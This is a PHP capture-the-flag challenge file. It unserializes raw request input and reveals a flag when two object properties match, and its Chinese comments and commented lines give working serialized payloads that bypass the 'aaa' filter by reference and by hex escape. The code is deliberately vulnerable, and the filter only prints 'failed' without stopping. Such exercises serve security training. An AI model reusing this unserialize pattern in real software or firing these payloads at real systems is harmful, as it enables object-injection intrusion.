<?php
header('Content-Type: text/html; charset=utf-8');
class test {
    public $a;
    public $b;
    public function __construct(){
        $this->a = 'aaa';
    }
    public function __destruct(){
 
        if($this->a === $this->b && $this->a==='aaa') {
           include('flag.php');
        }
    }
}
if(isset($_REQUEST['input'])) {
    // 过滤了aaa所以我们直接输入是不可以的，但是我们可以通过php的引用来引用a属性的地址值，使得$b 和 $a 地址相同进而使得值相等
    if(preg_match('/aaa/', $_REQUEST['input'])) {
       echo 'failed';
    }
    unserialize($_REQUEST['input']);
}else {
    highlight_file(__FILE__);
}

// class test {
//     public $a='aaa';
//     public $b;
//     public function __construct(){
//         $this->b ='aaa';
//     }
// }
// // var_dump(new test());
// $a = serialize(new test());
// // echo $a;

// echo urlencode('O:4:"test":2:{s:1:"a";s:3:"aaa";s:1:"b";S:3:"a\\61a";}');
// O:4:"test":2:{s:1:"a";s:3:"aaa";s:1:"b";R:2;}

// 把字符串类型的s改成大写的S之后，可以使用16进制绕过正则,注意要url编码之后再传参数
// O:4:"test":2:{s:1:"a";s:3:"aaa";s:1:"b";S:3:"a\\61a";}

// O%3A4%3A%22test%22%3A2%3A%7Bs%3A1%3A%22a%22%3Bs%3A3%3A%22aaa%22%3Bs%3A1%3A%22b%22%3BS%3A3%3A%22a%5C61a%22%3B%7D
?>